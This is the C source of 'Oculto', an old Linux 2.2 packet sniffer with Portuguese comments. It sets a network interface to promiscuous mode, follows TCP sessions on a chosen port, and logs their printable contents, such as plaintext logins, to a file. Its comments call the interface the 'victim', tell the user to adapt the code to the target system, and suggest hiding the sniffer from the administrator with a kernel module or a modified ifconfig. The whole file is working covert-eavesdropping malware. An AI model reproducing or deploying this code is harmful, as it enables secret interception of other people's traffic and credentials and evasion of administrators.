/* Oculto - Sniffer para Linux 2.2.X.
 * Desenvolvido por Nash Leon vulgo coracaodeleao.
 * Com base no linsniffer do Mike Edulla.
 * nashleon@yahoo.com.br
 * http://coracaodeleao.virtualave.net/
 */


#include <stdio.h>
#include <ctype.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/if.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/socket.h>
#include <linux/sockios.h>
#include <linux/if_ether.h>
#include <unistd.h>

#define    ERRO     -1

void ajuda(char *nome);
int seta_promiscuo(char *interface);
int pega_dados(int interface, unsigned short porta);
int escreve(int tam_dados, char *dados);
int filtra(unsigned short porta);
void zera(void);

struct iphdr  *ip;
struct tcphdr *tcp;
FILE *log;
int sniff, porta;

void ajuda(char *nome){
printf("\nOculto Sniffer v0.1 by Nash Leon.\n");
printf("\nUso: %s <interface> <porta> <arq_log>\n",nome);
exit(0);
}

struct
{
   unsigned long      end_origem;
   unsigned long      end_destino;
   unsigned short     porta_origem;
   unsigned short     porta_destino;
   char               ativar;
} captura;

/* Estrutura responsavel pelo device */

struct etherpacket
{
   struct ethhdr eth;
   struct iphdr  ip;
   struct tcphdr tcp;
   char buffer[7000];
} cabec_ether;


int main (int argc, char *argv[]){
char interface[20];

if(argc != 4){
ajuda(argv[0]);
}

strncpy(interface,argv[1],19);
porta = atoi(argv[2]);
log = fopen(argv[3],"at");

/* Altere abaixo conforme o sistema alvo! 
   Fiz a checagem apenas para forcar as
   coisas para os script kiddies. */

if(strcmp(interface,"lo") && strcmp(interface,"ppp") < 0){
fprintf(stderr,"Interface Invalida!:)\n");
fprintf(stderr,"Altere o codigo fonte!\n");
exit(ERRO);
}

if(log == NULL){
fprintf(stderr,"Erro na Abertura do Arquivo de Log!\n");
exit(ERRO);
}

/* Abaixo nos definimos os cabecalhos para recebimento */

ip = (struct iphdr *)(((unsigned long)&cabec_ether.ip)-2);
tcp = (struct tcphdr *)(((unsigned long)&cabec_ether.tcp)-2);

sniff = seta_promiscuo(interface);

if(sniff < 0) {
fprintf(stderr, "Nao foi possivel setar modo promiscuo na interface!\n");
exit(ERRO);
     }

zera();
/* looping infinito para espera de dados */
for(;;){

pega_dados(sniff,porta);
if(captura.ativar != 0){
escreve(htons(ip->tot_len)-sizeof(cabec_ether.ip)-sizeof(cabec_ether.tcp),cabec_ether.buffer-2);
fflush(log);
 }
}
return 0;
}

/* A funcao abaixo somente seta o modo promiscuo.
   Se voce nao quer usa-la, retire-a, agora, se for
   usa-la, use-a junto com algum processo p/ esconder
   do 'administrador' este esquema, LKM, alteracao do
   ifconfig e etc. */

int seta_promiscuo(char *interface){
int sniffer, manipula;

/* Estrutura responsavel por pegar a interface */

struct ifreq vitima;

/* Leia tutoriais de socket escritos por mim, caso
   tenha duvidas.. MSG_URG = 0x800. */

/* Usando notacao mais atual - PF_PACKET */

sniffer = socket(PF_PACKET, SOCK_RAW,htons(0x800));

if(sniffer < 0){
return(ERRO);
}

strcpy(vitima.ifr_name, interface);

/* SIOCGIFFLAGS = responsavel por setar flags */

manipula = ioctl(sniffer, SIOCGIFFLAGS, &vitima);
if(manipula < 0) {
close(sniffer);
return(ERRO);
}

/* Seta modo promiscuo como flag para a interface. */

vitima.ifr_flags |= IFF_PROMISC;

manipula = ioctl(sniffer, SIOCSIFFLAGS,&vitima);
if(manipula < 0) {
return(-1);
     }

return(sniffer);
}


 
int pega_dados(int interface, unsigned short porta){
int pegador;
while(1) {
pegador=read(interface,(struct etherpacket *)&cabec_ether,sizeof(cabec_ether));

if(pegador > 1){
if(filtra(porta)==0) continue;

pegador = pegador - 54;

if(pegador < 1) continue;
return pegador;
      }
   }
}

int filtra(unsigned short porta){
int p;
p=0;

/* Checa se o protocolo eh o TCP */

if(ip->protocol != 6) return 0;

if(ntohs(tcp->dest) == porta) p = 1; 

if(captura.ativar == 0)      
if(ntohs(tcp->dest) == porta)
captura.ativar = 1;
if(p == 1)
         if(tcp->syn == 1) {
            captura.end_origem=ip->saddr;
            captura.end_destino=ip->daddr;
            captura.ativar=1;
            captura.porta_origem=tcp->source;
            captura.porta_destino=tcp->dest;
           }
if(tcp->dest != captura.porta_destino) return 0;
if(tcp->source != captura.porta_origem) return 0;
if(ip->saddr != captura.end_origem) return 0;
if(ip->daddr != captura.end_destino) return 0;

if(tcp->rst == 1) {
      captura.ativar=0;
      fprintf(log, "\n-------- [Oculto v0.1 - RST] --------\n");
      zera();
      return 0;
   }
if(tcp->fin == 1) {
      captura.ativar=0;
      fprintf(log, "\n-------- [Oculto v0.1 - FIN] --------\n");
      zera();
      return 0;
   }

return 1;
}



int escreve(int tam_dados, char *dados)
{
 int i= 0, col = 0;
   
for(i=0;i != tam_dados;i++){
if(dados[i] == 13) { 
fprintf(log, "\n"); 
col=0; 
}

/* Se eh um caracter imprimivel valido ele loga */

if(isprint(dados[i])) {
fprintf(log, "%c", dados[i]);
col++;
}

/* 70 colunas - ele dah uma nova linha. */

if(col > 70){
col=0;
fprintf(log, "\n");}
   }
}


void zera(void){
captura.end_origem = 0;
captura.end_destino = 0;
captura.porta_origem = 0;
captura.porta_destino = 0;
captura.ativar = 0;
fprintf(log,"\n\n-[Oculto v0.1] - Zerando para Recebimento...\n");
}
